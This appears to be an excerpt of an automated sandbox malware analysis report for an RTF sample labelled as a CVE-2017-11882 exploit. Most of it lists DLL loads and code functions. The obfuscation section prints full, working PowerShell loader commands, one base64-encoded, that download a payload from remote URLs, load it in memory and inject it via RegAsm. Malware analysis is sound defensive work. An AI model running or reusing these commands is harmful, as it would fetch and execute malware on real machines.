                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pstorec.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mozglue.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pstorec.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: atl.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mozglue.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wsock32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                  Source: SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.LNK.0.drLNK file: ..\..\..\..\..\Desktop\SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtf
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: Binary string: System.Data.Linq.pdb source: powershell.exe, 00000008.00000002.385255527.00000000063D0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.383266190.0000000004289000.00000004.00000800.00020000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  Obfuscated command line found
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $pSHOmE[4]+$PSHOME[34]+'X')( ('HqRur'+'l '+'= '+'VUF'+'ht'+'t'+'ps://i'+'a6'+'00100.us.archive.or'+'g/'+'24/it'+'ems/d'+'e'+'ta'+'h-no'+'t'+'e-v/De'+'t'+'ahNote'+'V.txtVU'+'F'+';HqRba'+'se64'+'C'+'ontent = (New'+'-Obje'+'ct'+' Sys'+'tem'+'.N'+'e'+'t.We'+'b'+'C'+'li'+'e'+'nt'+')'+'.Downl'+'o'+'adS'+'tri'+'ng(HqRurl);HqRbi'+'naryContent = [S'+'ystem.C'+'o'+'n'+'vert]::FromBas'+'e64Stri'+'ng(HqRbase'+'64C'+'ont'+'ent);HqR'+'as'+'sembly'+' = [R'+'eflection.As'+'sem'+'bly]::Load(H'+'qRb'+'inar'+'yC'+'on'+'t'+'ent);'+'Hq'+'Rtype ='+' '+'H'+'qRasse'+'mbly.GetType(V'+'UFRun'+'P'+'E.'+'HomeVUF'+');H'+'qR'+'met'+'hod = HqRt'+'ype.GetMet'+'hod('+'VUFVA'+'IVUF);HqRmet'+'hod.Invoke(HqR'+'null'+', [object[]]@(VU'+'Ftxt.'+'VBGR/'+'05'+'5/2'+'5'+'.01.92.58'+'1//:'+'ptthVUF , '+'VUFd'+'esa'+'t'+'iv'+'ad'+'oVUF '+','+' VU'+'Fd'+'esati'+'v'+'ad'+'oV'+'UF'+' '+','+' V'+'UFde'+'s'+'ati'+'vadoVUF,'+'VUFRe'+'gAsmV'+'UF,VUFV'+'UF))').Replace(([cHAr]72+[cHAr]113+[cHAr]82),[StRIng][cHAr]36).Replace(([cHAr]86+[cHAr]85+[cHAr]70),[StRIng][cHAr]39) )"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $pSHOmE[4]+$PSHOME[34]+'X')( ('HqRur'+'l '+'= '+'VUF'+'ht'+'t'+'ps://i'+'a6'+'00100.us.archive.or'+'g/'+'24/it'+'ems/d'+'e'+'ta'+'h-no'+'t'+'e-v/De'+'t'+'ahNote'+'V.txtVU'+'F'+';HqRba'+'se64'+'C'+'ontent = (New'+'-Obje'+'ct'+' Sys'+'tem'+'.N'+'e'+'t.We'+'b'+'C'+'li'+'e'+'nt'+')'+'.Downl'+'o'+'adS'+'tri'+'ng(HqRurl);HqRbi'+'naryContent = [S'+'ystem.C'+'o'+'n'+'vert]::FromBas'+'e64Stri'+'ng(HqRbase'+'64C'+'ont'+'ent);HqR'+'as'+'sembly'+' = [R'+'eflection.As'+'sem'+'bly]::Load(H'+'qRb'+'inar'+'yC'+'on'+'t'+'ent);'+'Hq'+'Rtype ='+' '+'H'+'qRasse'+'mbly.GetType(V'+'UFRun'+'P'+'E.'+'HomeVUF'+');H'+'qR'+'met'+'hod = HqRt'+'ype.GetMet'+'hod('+'VUFVA'+'IVUF);HqRmet'+'hod.Invoke(HqR'+'null'+', [object[]]@(VU'+'Ftxt.'+'VBGR/'+'05'+'5/2'+'5'+'.01.92.58'+'1//:'+'ptthVUF , '+'VUFd'+'esa'+'t'+'iv'+'ad'+'oVUF '+','+' VU'+'Fd'+'esati'+'v'+'ad'+'oV'+'UF'+' '+','+' V'+'UFde'+'s'+'ati'+'vadoVUF,'+'VUFRe'+'gAsmV'+'UF,VUFV'+'UF))').Replace(([cHAr]72+[cHAr]113+[cHAr]82),[StRIng][cHAr]36).Replace(([cHAr]86+[cHAr]85+[cHAr]70),[StRIng][cHAr]39) )"Jump to behavior
                  Suspicious powershell command line found
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRwU0hPbUVbNF0rJFBTSE9NRVszNF0rJ1gnKSggKCdIcVJ1cicrJ2wgJysnPSAnKydWVUYnKydodCcrJ3QnKydwczovL2knKydhNicrJzAwMTAwLnVzLmFyY2hpdmUub3InKydnLycrJzI0L2l0JysnZW1zL2QnKydlJysndGEnKydoLW5vJysndCcrJ2Utdi9EZScrJ3QnKydhaE5vdGUnKydWLnR4dFZVJysnRicrJztIcVJiYScrJ3NlNjQnKydDJysnb250ZW50ID0gKE5ldycrJy1PYmplJysnY3QnKycgU3lzJysndGVtJysnLk4nKydlJysndC5XZScrJ2InKydDJysnbGknKydlJysnbnQnKycpJysnLkRvd25sJysnbycrJ2FkUycrJ3RyaScrJ25nKEhxUnVybCk7SHFSYmknKyduYXJ5Q29udGVudCA9IFtTJysneXN0ZW0uQycrJ28nKyduJysndmVydF06OkZyb21CYXMnKydlNjRTdHJpJysnbmcoSHFSYmFzZScrJzY0QycrJ29udCcrJ2VudCk7SHFSJysnYXMnKydzZW1ibHknKycgPSBbUicrJ2VmbGVjdGlvbi5BcycrJ3NlbScrJ2JseV06OkxvYWQoSCcrJ3FSYicrJ2luYXInKyd5QycrJ29uJysndCcrJ2VudCk7JysnSHEnKydSdHlwZSA9JysnICcrJ0gnKydxUmFzc2UnKydtYmx5LkdldFR5cGUoVicrJ1VGUnVuJysnUCcrJ0UuJysnSG9tZVZVRicrJyk7SCcrJ3FSJysnbWV0JysnaG9kID0gSHFSdCcrJ3lwZS5HZXRNZXQnKydob2QoJysnVlVGVkEnKydJVlVGKTtIcVJtZXQnKydob2QuSW52b2tlKEhxUicrJ251bGwnKycsIFtvYmplY3RbXV1AKFZVJysnRnR4dC4nKydWQkdSLycrJzA1JysnNS8yJysnNScrJy4wMS45Mi41OCcrJzEvLzonKydwdHRoVlVGICwgJysnVlVGZCcrJ2VzYScrJ3QnKydpdicrJ2FkJysnb1ZVRiAnKycsJysnIFZVJysnRmQnKydlc2F0aScrJ3YnKydhZCcrJ29WJysnVUYnKycgJysnLCcrJyBWJysnVUZkZScrJ3MnKydhdGknKyd2YWRvVlVGLCcrJ1ZVRlJlJysnZ0FzbVYnKydVRixWVUZWJysnVUYpKScpLlJlcGxhY2UoKFtjSEFyXTcyK1tjSEFyXTExMytbY0hBcl04MiksW1N0UkluZ11bY0hBcl0zNikuUmVwbGFjZSgoW2NIQXJdODYrW2NIQXJdODUrW2NIQXJdNzApLFtTdFJJbmddW2NIQXJdMzkpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $pSHOmE[4]+$PSHOME[34]+'X')( ('HqRur'+'l '+'= '+'VUF'+'ht'+'t'+'ps://i'+'a6'+'00100.us.archive.or'+'g/'+'24/it'+'ems/d'+'e'+'ta'+'h-no'+'t'+'e-v/De'+'t'+'ahNote'+'V.txtVU'+'F'+';HqRba'+'se64'+'C'+'ontent = (New'+'-Obje'+'ct'+' Sys'+'tem'+'.N'+'e'+'t.We'+'b'+'C'+'li'+'e'+'nt'+')'+'.Downl'+'o'+'adS'+'tri'+'ng(HqRurl);HqRbi'+'naryContent = [S'+'ystem.C'+'o'+'n'+'vert]::FromBas'+'e64Stri'+'ng(HqRbase'+'64C'+'ont'+'ent);HqR'+'as'+'sembly'+' = [R'+'eflection.As'+'sem'+'bly]::Load(H'+'qRb'+'inar'+'yC'+'on'+'t'+'ent);'+'Hq'+'Rtype ='+' '+'H'+'qRasse'+'mbly.GetType(V'+'UFRun'+'P'+'E.'+'HomeVUF'+');H'+'qR'+'met'+'hod = HqRt'+'ype.GetMet'+'hod('+'VUFVA'+'IVUF);HqRmet'+'hod.Invoke(HqR'+'null'+', [object[]]@(VU'+'Ftxt.'+'VBGR/'+'05'+'5/2'+'5'+'.01.92.58'+'1//:'+'ptthVUF , '+'VUFd'+'esa'+'t'+'iv'+'ad'+'oVUF '+','+' VU'+'Fd'+'esati'+'v'+'ad'+'oV'+'UF'+' '+','+' V'+'UFde'+'s'+'ati'+'vadoVUF,'+'VUFRe'+'gAsmV'+'UF,VUFV'+'UF))').Replace(([cHAr]72+[cHAr]113+[cHAr]82),[StRIng][cHAr]36).Replace(([cHAr]86+[cHAr]85+[cHAr]70),[StRIng][cHAr]39) )"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRwU0hPbUVbNF0rJFBTSE9NRVszNF0rJ1gnKSggKCdIcVJ1cicrJ2wgJysnPSAnKydWVUYnKydodCcrJ3QnKydwczovL2knKydhNicrJzAwMTAwLnVzLmFyY2hpdmUub3InKydnLycrJzI0L2l0JysnZW1zL2QnKydlJysndGEnKydoLW5vJysndCcrJ2Utdi9EZScrJ3QnKydhaE5vdGUnKydWLnR4dFZVJysnRicrJztIcVJiYScrJ3NlNjQnKydDJysnb250ZW50ID0gKE5ldycrJy1PYmplJysnY3QnKycgU3lzJysndGVtJysnLk4nKydlJysndC5XZScrJ2InKydDJysnbGknKydlJysnbnQnKycpJysnLkRvd25sJysnbycrJ2FkUycrJ3RyaScrJ25nKEhxUnVybCk7SHFSYmknKyduYXJ5Q29udGVudCA9IFtTJysneXN0ZW0uQycrJ28nKyduJysndmVydF06OkZyb21CYXMnKydlNjRTdHJpJysnbmcoSHFSYmFzZScrJzY0QycrJ29udCcrJ2VudCk7SHFSJysnYXMnKydzZW1ibHknKycgPSBbUicrJ2VmbGVjdGlvbi5BcycrJ3NlbScrJ2JseV06OkxvYWQoSCcrJ3FSYicrJ2luYXInKyd5QycrJ29uJysndCcrJ2VudCk7JysnSHEnKydSdHlwZSA9JysnICcrJ0gnKydxUmFzc2UnKydtYmx5LkdldFR5cGUoVicrJ1VGUnVuJysnUCcrJ0UuJysnSG9tZVZVRicrJyk7SCcrJ3FSJysnbWV0JysnaG9kID0gSHFSdCcrJ3lwZS5HZXRNZXQnKydob2QoJysnVlVGVkEnKydJVlVGKTtIcVJtZXQnKydob2QuSW52b2tlKEhxUicrJ251bGwnKycsIFtvYmplY3RbXV1AKFZVJysnRnR4dC4nKydWQkdSLycrJzA1JysnNS8yJysnNScrJy4wMS45Mi41OCcrJzEvLzonKydwdHRoVlVGICwgJysnVlVGZCcrJ2VzYScrJ3QnKydpdicrJ2FkJysnb1ZVRiAnKycsJysnIFZVJysnRmQnKydlc2F0aScrJ3YnKydhZCcrJ29WJysnVUYnKycgJysnLCcrJyBWJysnVUZkZScrJ3MnKydhdGknKyd2YWRvVlVGLCcrJ1ZVRlJlJysnZ0FzbVYnKydVRixWVUZWJysnVUYpKScpLlJlcGxhY2UoKFtjSEFyXTcyK1tjSEFyXTExMytbY0hBcl04MiksW1N0UkluZ11bY0hBcl0zNikuUmVwbGFjZSgoW2NIQXJdODYrW2NIQXJdODUrW2NIQXJdNzApLFtTdFJJbmddW2NIQXJdMzkpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $pSHOmE[4]+$PSHOME[34]+'X')( ('HqRur'+'l '+'= '+'VUF'+'ht'+'t'+'ps://i'+'a6'+'00100.us.archive.or'+'g/'+'24/it'+'ems/d'+'e'+'ta'+'h-no'+'t'+'e-v/De'+'t'+'ahNote'+'V.txtVU'+'F'+';HqRba'+'se64'+'C'+'ontent = (New'+'-Obje'+'ct'+' Sys'+'tem'+'.N'+'e'+'t.We'+'b'+'C'+'li'+'e'+'nt'+')'+'.Downl'+'o'+'adS'+'tri'+'ng(HqRurl);HqRbi'+'naryContent = [S'+'ystem.C'+'o'+'n'+'vert]::FromBas'+'e64Stri'+'ng(HqRbase'+'64C'+'ont'+'ent);HqR'+'as'+'sembly'+' = [R'+'eflection.As'+'sem'+'bly]::Load(H'+'qRb'+'inar'+'yC'+'on'+'t'+'ent);'+'Hq'+'Rtype ='+' '+'H'+'qRasse'+'mbly.GetType(V'+'UFRun'+'P'+'E.'+'HomeVUF'+');H'+'qR'+'met'+'hod = HqRt'+'ype.GetMet'+'hod('+'VUFVA'+'IVUF);HqRmet'+'hod.Invoke(HqR'+'null'+', [object[]]@(VU'+'Ftxt.'+'VBGR/'+'05'+'5/2'+'5'+'.01.92.58'+'1//:'+'ptthVUF , '+'VUFd'+'esa'+'t'+'iv'+'ad'+'oVUF '+','+' VU'+'Fd'+'esati'+'v'+'ad'+'oV'+'UF'+' '+','+' V'+'UFde'+'s'+'ati'+'vadoVUF,'+'VUFRe'+'gAsmV'+'UF,VUFV'+'UF))').Replace(([cHAr]72+[cHAr]113+[cHAr]82),[StRIng][cHAr]36).Replace(([cHAr]86+[cHAr]85+[cHAr]70),[StRIng][cHAr]39) )"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,9_2_0041CBE1
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00564A6C push eax; ret 2_2_00564A6F
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0054F927 push cs; retn 0000h2_2_0054F92D
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005635C6 push eax; ret 2_2_005635C7
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00564BF2 push eax; ret 2_2_00564BF3
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00558EE1 push eax; retf 2_2_00558F61
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00564BEA push eax; ret 2_2_00564BEB
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005635BE push eax; ret 2_2_005635BF
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00264A64 push esp; ret 8_2_00264A71
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00264AA8 push esp; ret 8_2_00264A71
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_002625E9 push ebx; retf 8_2_002625EA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00457186 push ecx; ret 9_2_00457199
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0045E55D push esi; ret 9_2_0045E566
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00457AA8 push eax; ret 9_2_00457AC6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00434EB6 push ecx; ret 9_2_00434EC9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_10002806 push ecx; ret 9_2_10002819
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0044693D push ecx; ret 13_2_0044694D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0044DB70 push eax; ret 13_2_0044DB84
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0044DB70 push eax; ret 13_2_0044DBAC
